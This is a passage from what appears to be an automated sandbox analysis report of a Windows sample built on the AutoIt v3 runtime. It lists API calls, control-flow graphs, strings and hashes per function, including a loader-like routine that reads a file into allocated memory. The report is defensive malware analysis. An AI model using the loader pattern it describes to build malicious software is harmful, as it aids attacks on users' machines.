                                                                              • Part of subcall function 00304517: _fseek.LIBCMT ref: 0030452F
                                                                            • __wsplitpath.LIBCMT ref: 0034C083
                                                                              • Part of subcall function 00321DFC: __wsplitpath_helper.LIBCMT ref: 00321E3C
                                                                            • _wcscpy.LIBCMT ref: 0034C096
                                                                            • _wcscat.LIBCMT ref: 0034C0A9
                                                                            • __wsplitpath.LIBCMT ref: 0034C0CE
                                                                            • _wcscat.LIBCMT ref: 0034C0E4
                                                                            • _wcscat.LIBCMT ref: 0034C0F7
                                                                            • _wcscmp.LIBCMT ref: 0034C03E
                                                                              • Part of subcall function 0034C56D: _wcscmp.LIBCMT ref: 0034C65D
                                                                              • Part of subcall function 0034C56D: _wcscmp.LIBCMT ref: 0034C670
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0034C2A1
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0034C338
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0034C34E
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0034C35F
                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0034C371
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                            • String ID: p1v`Kv
                                                                            • API String ID: 2378138488-2864719405
                                                                            • Opcode ID: b4886646d6db2967928ae1eaef40924ae12cf137deec1d4e5ad14eafda1256b0
                                                                            • Instruction ID: 6e9ab7de453569ee6df93839581d715959ef38384ac1d66b34038a94fc084b94
                                                                            • Opcode Fuzzy Hash: b4886646d6db2967928ae1eaef40924ae12cf137deec1d4e5ad14eafda1256b0
                                                                            • Instruction Fuzzy Hash: FAC12EB1E11229AFDF52DF95CC81EDEB7BDAF49310F0040A6F609EA151DB70AA448F61

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00303F86
                                                                            • RegisterClassExW.USER32(00000030), ref: 00303FB0
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00303FC1
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00303FDE
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00303FEE
                                                                            • LoadIconW.USER32(000000A9), ref: 00304004
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00304013
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: 90b76c70a8c9f60a8fd93860144e44842dc4b110b16a1fc5f5f9b976770c103a
                                                                            • Instruction ID: 0667313c22381a0e9b65dae55e9d77a2d8867655adf03696bd8c9fb154e745e3
                                                                            • Opcode Fuzzy Hash: 90b76c70a8c9f60a8fd93860144e44842dc4b110b16a1fc5f5f9b976770c103a
                                                                            • Instruction Fuzzy Hash: 5E21C7B5900318AFDB02EFA4EC89BCDBBB8FB09714F10421AFA11E62A0D7B45554DF91

                                                                            Control-flow Graph

                                                                            control_flow_graph 1175 303742-303762 1177 3037c2-3037c4 1175->1177 1178 303764-303767 1175->1178 1177->1178 1181 3037c6 1177->1181 1179 3037c8 1178->1179 1180 303769-303770 1178->1180 1182 371e00-371e2e call 302ff6 call 31e312 1179->1182 1183 3037ce-3037d1 1179->1183 1184 303776-30377b 1180->1184 1185 30382c-303834 PostQuitMessage 1180->1185 1186 3037ab-3037b3 DefWindowProcW 1181->1186 1222 371e33-371e3a 1182->1222 1187 3037d3-3037d4 1183->1187 1188 3037f6-30381d SetTimer RegisterWindowMessageW 1183->1188 1190 303781-303783 1184->1190 1191 371e88-371e9c call 344ddd 1184->1191 1192 3037f2-3037f4 1185->1192 1193 3037b9-3037bf 1186->1193 1194 371da3-371da6 1187->1194 1195 3037da-3037ed KillTimer call 303847 call 30390f 1187->1195 1188->1192 1197 30381f-30382a CreatePopupMenu 1188->1197 1198 303836-303845 call 31eb83 1190->1198 1199 303789-30378e 1190->1199 1191->1192 1214 371ea2 1191->1214 1192->1193 1207 371ddc-371dfb MoveWindow 1194->1207 1208 371da8-371daa 1194->1208 1195->1192 1197->1192 1198->1192 1203 303794-303799 1199->1203 1204 371e6d-371e74 1199->1204 1212 371e58-371e68 call 3455bd 1203->1212 1213 30379f-3037a5 1203->1213 1204->1186 1210 371e7a-371e83 call 33a5f3 1204->1210 1207->1192 1216 371dac-371daf 1208->1216 1217 371dcb-371dd7 SetFocus 1208->1217 1210->1186 1212->1192 1213->1186 1213->1222 1214->1186 1216->1213 1218 371db5-371dc6 call 302ff6 1216->1218 1217->1192 1218->1192 1222->1186 1226 371e40-371e53 call 303847 call 304ffc 1222->1226 1226->1186
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 003037B3
                                                                            • KillTimer.USER32(?,00000001), ref: 003037DD
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00303800
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0030380B
                                                                            • CreatePopupMenu.USER32 ref: 0030381F
                                                                            • PostQuitMessage.USER32(00000000), ref: 0030382E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 129472671-2362178303
                                                                            • Opcode ID: f2a7ed0885ac880fc0ade78815c2dc518397d91121006ed77eda70ccc5c79c64
                                                                            • Instruction ID: 9a8cc70e2c0d0f65004b8497fe2ffac7f8c12d92efb0c257115400d7ae461a1d
                                                                            • Opcode Fuzzy Hash: f2a7ed0885ac880fc0ade78815c2dc518397d91121006ed77eda70ccc5c79c64
                                                                            • Instruction Fuzzy Hash: 874199F610120AABDB235F28DC6AF7A379DFB41B00F004119F902D64D3DB64EE50A762

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00303E79
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00303E88
                                                                            • LoadIconW.USER32(00000063), ref: 00303E9E
                                                                            • LoadIconW.USER32(000000A4), ref: 00303EB0
                                                                            • LoadIconW.USER32(000000A2), ref: 00303EC2
                                                                              • Part of subcall function 00304024: LoadImageW.USER32(00300000,00000063,00000001,00000010,00000010,00000000), ref: 00304048
                                                                            • RegisterClassExW.USER32(?), ref: 00303F30
                                                                              • Part of subcall function 00303F53: GetSysColorBrush.USER32(0000000F), ref: 00303F86
                                                                              • Part of subcall function 00303F53: RegisterClassExW.USER32(00000030), ref: 00303FB0
                                                                              • Part of subcall function 00303F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00303FC1
                                                                              • Part of subcall function 00303F53: InitCommonControlsEx.COMCTL32(?), ref: 00303FDE
                                                                              • Part of subcall function 00303F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00303FEE
                                                                              • Part of subcall function 00303F53: LoadIconW.USER32(000000A9), ref: 00304004
                                                                              • Part of subcall function 00303F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00304013
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                            • String ID: #$0$AutoIt v3
                                                                            • API String ID: 423443420-4155596026
                                                                            • Opcode ID: ffa3271aa636ee35b86bf939d878594df32b4e76450e2ff93de2dcde2291920f
                                                                            • Instruction ID: e219952eda4572c7da001942e44ad31b74d1770bea7f7bda0109749b60d2fd0b
                                                                            • Opcode Fuzzy Hash: ffa3271aa636ee35b86bf939d878594df32b4e76450e2ff93de2dcde2291920f
                                                                            • Instruction Fuzzy Hash: 9B215EB0D00314AFCB42DFA9EC45E9ABBF9FB49314F14412AE204E62A1D77566509F91

                                                                            Control-flow Graph

                                                                            control_flow_graph 1239 32acb3-32ace0 call 326ac0 call 327cf4 call 326986 1246 32ace2-32acf8 call 32e880 1239->1246 1247 32acfd-32ad02 1239->1247 1253 32af52-32af57 call 326b05 1246->1253 1249 32ad08-32ad0f 1247->1249 1251 32ad42-32ad51 GetStartupInfoW 1249->1251 1252 32ad11-32ad40 1249->1252 1254 32ae80-32ae86 1251->1254 1255 32ad57-32ad5c 1251->1255 1252->1249 1256 32af44-32af50 call 32af58 1254->1256 1257 32ae8c-32ae9d 1254->1257 1255->1254 1259 32ad62-32ad79 1255->1259 1256->1253 1260 32aeb2-32aeb8 1257->1260 1261 32ae9f-32aea2 1257->1261 1264 32ad80-32ad83 1259->1264 1265 32ad7b-32ad7d 1259->1265 1268 32aeba-32aebd 1260->1268 1269 32aebf-32aec6 1260->1269 1261->1260 1267 32aea4-32aead 1261->1267 1266 32ad86-32ad8c 1264->1266 1265->1264 1271 32adae-32adb6 1266->1271 1272 32ad8e-32ad9f call 326986 1266->1272 1273 32af3e-32af3f 1267->1273 1274 32aec9-32aed5 GetStdHandle 1268->1274 1269->1274 1276 32adb9-32adbb 1271->1276 1283 32ae33-32ae3a 1272->1283 1284 32ada5-32adab 1272->1284 1273->1254 1277 32aed7-32aed9 1274->1277 1278 32af1c-32af32 1274->1278 1276->1254 1281 32adc1-32adc6 1276->1281 1277->1278 1282 32aedb-32aee4 GetFileType 1277->1282 1278->1273 1280 32af34-32af37 1278->1280 1280->1273 1285 32ae20-32ae31 1281->1285 1286 32adc8-32adcb 1281->1286 1282->1278 1287 32aee6-32aef0 1282->1287 1288 32ae40-32ae4e 1283->1288 1284->1271 1285->1276 1286->1285 1289 32adcd-32add1 1286->1289 1290 32aef2-32aef8 1287->1290 1291 32aefa-32aefd 1287->1291 1295 32ae50-32ae72 1288->1295 1296 32ae74-32ae7b 1288->1296 1289->1285 1297 32add3-32add5 1289->1297 1292 32af05 1290->1292 1293 32af08-32af1a InitializeCriticalSectionAndSpinCount 1291->1293 1294 32aeff-32af03 1291->1294 1292->1293 1293->1273 1294->1292 1295->1288 1296->1266 1298 32add7-32ade3 GetFileType 1297->1298 1299 32ade5-32ae1a InitializeCriticalSectionAndSpinCount 1297->1299 1298->1299 1300 32ae1d 1298->1300 1299->1300 1300->1285
                                                                            APIs
                                                                            • __lock.LIBCMT ref: 0032ACC1
                                                                              • Part of subcall function 00327CF4: __mtinitlocknum.LIBCMT ref: 00327D06
                                                                              • Part of subcall function 00327CF4: EnterCriticalSection.KERNEL32(00000000,?,00327ADD,0000000D), ref: 00327D1F
                                                                            • __calloc_crt.LIBCMT ref: 0032ACD2
                                                                              • Part of subcall function 00326986: __calloc_impl.LIBCMT ref: 00326995
                                                                              • Part of subcall function 00326986: Sleep.KERNEL32(00000000,000003BC,0031F507,?,0000000E), ref: 003269AC
                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0032ACED
                                                                            • GetStartupInfoW.KERNEL32(?,003B6E28,00000064,00325E91,003B6C70,00000014), ref: 0032AD46
                                                                            • __calloc_crt.LIBCMT ref: 0032AD91
                                                                            • GetFileType.KERNEL32(00000001), ref: 0032ADD8
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0032AE11
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                            • String ID:
                                                                            • API String ID: 1426640281-0
                                                                            • Opcode ID: 22870c59ab4ae24e8ba6f12bed86930a5b546185daca75d0c852ac34f2455c89
                                                                            • Instruction ID: 60ac058e11c0b767771ae4fd22d5cff4d757f38b36f1f55f2404a11b76b4fe3c
                                                                            • Opcode Fuzzy Hash: 22870c59ab4ae24e8ba6f12bed86930a5b546185daca75d0c852ac34f2455c89
                                                                            • Instruction Fuzzy Hash: EE81E270905B658FDB16CF68E8809ADBBF4AF09324F25425DD4A6EB3E1D7349803CB52

                                                                            Control-flow Graph

                                                                            control_flow_graph 1301 d46e90-d46f3e call d448a0 1304 d46f45-d46f6b call d47da0 CreateFileW 1301->1304 1307 d46f72-d46f82 1304->1307 1308 d46f6d 1304->1308 1316 d46f84 1307->1316 1317 d46f89-d46fa3 VirtualAlloc 1307->1317 1309 d470bd-d470c1 1308->1309 1310 d47103-d47106 1309->1310 1311 d470c3-d470c7 1309->1311 1313 d47109-d47110 1310->1313 1314 d470d3-d470d7 1311->1314 1315 d470c9-d470cc 1311->1315 1320 d47165-d4717a 1313->1320 1321 d47112-d4711d 1313->1321 1322 d470e7-d470eb 1314->1322 1323 d470d9-d470e3 1314->1323 1315->1314 1316->1309 1318 d46fa5 1317->1318 1319 d46faa-d46fc1 ReadFile 1317->1319 1318->1309 1324 d46fc3 1319->1324 1325 d46fc8-d47008 VirtualAlloc 1319->1325 1328 d4717c-d47187 VirtualFree 1320->1328 1329 d4718a-d47192 1320->1329 1326 d47121-d4712d 1321->1326 1327 d4711f 1321->1327 1330 d470ed-d470f7 1322->1330 1331 d470fb 1322->1331 1323->1322 1324->1309 1332 d4700f-d4702a call d47ff0 1325->1332 1333 d4700a 1325->1333 1334 d47141-d4714d 1326->1334 1335 d4712f-d4713f 1326->1335 1327->1320 1328->1329 1330->1331 1331->1310 1341 d47035-d4703f 1332->1341 1333->1309 1338 d4714f-d47158 1334->1338 1339 d4715a-d47160 1334->1339 1337 d47163 1335->1337 1337->1313 1338->1337 1339->1337 1342 d47041-d47070 call d47ff0 1341->1342 1343 d47072-d47086 call d47e00 1341->1343 1342->1341 1348 d47088 1343->1348 1349 d4708a-d4708e 1343->1349 1348->1309 1351 d47090-d47094 CloseHandle 1349->1351 1352 d4709a-d4709e 1349->1352 1351->1352 1353 d470a0-d470ab VirtualFree 1352->1353 1354 d470ae-d470b7 1352->1354 1353->1354 1354->1304 1354->1309
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D46F61
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D47187
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileFreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 204039940-0
                                                                            • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                            • Instruction ID: 7ee08922c2488560cee28fae28a514b5c55d1840d1b6c26e0e84c5721e808e58
                                                                            • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                            • Instruction Fuzzy Hash: EAA11570E05209EBDB14CFA4C894BEEBBB5FF48304F248559E601BB280D7759A85CFA5

                                                                            Control-flow Graph

                                                                            control_flow_graph 1410 3049fb-304a25 call 30bcce RegOpenKeyExW 1413 3741cc-3741e3 RegQueryValueExW 1410->1413 1414 304a2b-304a2f 1410->1414 1415 374246-37424f RegCloseKey 1413->1415 1416 3741e5-374222 call 31f4ea call 3047b7 RegQueryValueExW 1413->1416 1421 374224-37423b call 306a63 1416->1421 1422 37423d-374245 call 3047e2 1416->1422 1421->1422 1422->1415
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00304A1D
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003741DB
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0037421A
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00374249
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$CloseOpen
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt
                                                                            • API String ID: 1586453840-614718249
                                                                            • Opcode ID: 568f7000cbce93d8f276dfe69e66cdea964c9906efc6841b3b951c9edc896cdc
                                                                            • Instruction ID: c165115c625cd271999d6c71f9c558e95fc60b1cc0f8f220e8e9e868458373be
                                                                            • Opcode Fuzzy Hash: 568f7000cbce93d8f276dfe69e66cdea964c9906efc6841b3b951c9edc896cdc
                                                                            • Instruction Fuzzy Hash: 40116DB1601209BEEB16ABA4CD96DEF7BACEF04744F004054F506D6191EB70AE01DB50

                                                                            Control-flow Graph

                                                                            control_flow_graph 1437 3036b8-303728 CreateWindowExW * 2 ShowWindow * 2
                                                                            APIs
                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003036E6
                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00303707
                                                                            • ShowWindow.USER32(00000000,?,?,?,?,00303AA3,?), ref: 0030371B
                                                                            • ShowWindow.USER32(00000000,?,?,?,?,00303AA3,?), ref: 00303724
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            • Opcode ID: bf542ee2798a1e27c7a5636c2276cd04ec5dd8f8a591e7583fe2de98754f1baf
                                                                            • Instruction ID: e0391ebd70726112edfd47b06271b38c572fd0ebf7ad17464fc5df3184a294b0
                                                                            • Opcode Fuzzy Hash: bf542ee2798a1e27c7a5636c2276cd04ec5dd8f8a591e7583fe2de98754f1baf
                                                                            • Instruction Fuzzy Hash: 12F0DA755402E07AEB325B67AC09E672E7DEBC7F24F00001ABA04E21A1C56528A5EBB0

                                                                            Control-flow Graph

                                                                            control_flow_graph 1542 d46c50-d46d8d call d448a0 call d46b40 CreateFileW 1549 d46d94-d46da4 1542->1549 1550 d46d8f 1542->1550 1553 d46da6 1549->1553 1554 d46dab-d46dc5 VirtualAlloc 1549->1554 1551 d46e44-d46e49 1550->1551 1553->1551 1555 d46dc7 1554->1555 1556 d46dc9-d46de0 ReadFile 1554->1556 1555->1551 1557 d46de4-d46e1e call d46b80 call d45b40 1556->1557 1558 d46de2 1556->1558 1563 d46e20-d46e35 call d46bd0 1557->1563 1564 d46e3a-d46e42 ExitProcess 1557->1564 1558->1551 1563->1564 1564->1551
                                                                            APIs
                                                                              • Part of subcall function 00D46B40: Sleep.KERNELBASE(000001F4), ref: 00D46B51
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D46D83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileSleep
                                                                            • String ID: CJV7Y9174NENJCCC
                                                                            • API String ID: 2694422964-3284114443
                                                                            • Opcode ID: bdd541ccb8cf7903bb101bd7ac80f472d2efdaaa6c201eabf0ee0ab7ff4ff620
                                                                            • Instruction ID: 3b7a74608b36393718a41ebb2335119fff45c869da07ec31f8034f1ee8d1df61
                                                                            • Opcode Fuzzy Hash: bdd541ccb8cf7903bb101bd7ac80f472d2efdaaa6c201eabf0ee0ab7ff4ff620
                                                                            • Instruction Fuzzy Hash: FC516D70E04248EBEB11DBA4C815BEEBB79EF15304F004199E609BB2C1D6B95B45CB76
                                                                            APIs
                                                                              • Part of subcall function 00305374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003C1148,?,003061FF,?,00000000,00000001,00000000), ref: 00305392
                                                                              • Part of subcall function 003049FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00304A1D
                                                                            • _wcscat.LIBCMT ref: 00372D80
                                                                            • _wcscat.LIBCMT ref: 00372DB5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat$FileModuleNameOpen
                                                                            • String ID: 8!<$\$\Include\
                                                                            • API String ID: 3592542968-4102530510
                                                                            • Opcode ID: e95229aefca153d371a37ff0103f91ee4050192fe648c54e364a48c1b310d898
                                                                            • Instruction ID: 1fa24ca6bce4175597acc0b0be5f13d2d3b4f54ae7296c5b2f85fb3d93ab96fa
                                                                            • Opcode Fuzzy Hash: e95229aefca153d371a37ff0103f91ee4050192fe648c54e364a48c1b310d898
                                                                            • Instruction Fuzzy Hash: E8515EB54053409FC717EF55E892C9BB3F8BE59300F48452EF649DB2A1EB74AA08CB52
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0030522F
                                                                            • _wcscpy.LIBCMT ref: 00305283
                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00305293
                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00373CB0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                            • String ID: Line:
                                                                            • API String ID: 1053898822-1585850449
                                                                            • Opcode ID: c0d5bd6a709eefff041278250f22fc359e19f6108a5578a35ca80217872f19a9
                                                                            • Instruction ID: 379c4f2886115c8dceb23ceb0c562fd48ce2145475f55bc29c0949c9ff5bc5eb
                                                                            • Opcode Fuzzy Hash: c0d5bd6a709eefff041278250f22fc359e19f6108a5578a35ca80217872f19a9
                                                                            • Instruction Fuzzy Hash: 7031AC7100A750AFD727EB60EC66FEB77DCAF45300F00491AF589960D2EB74A6488B96
                                                                            APIs
                                                                              • Part of subcall function 003041A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003039FE,?,00000001), ref: 003041DB
                                                                            • _free.LIBCMT ref: 003736B7
                                                                            • _free.LIBCMT ref: 003736FE
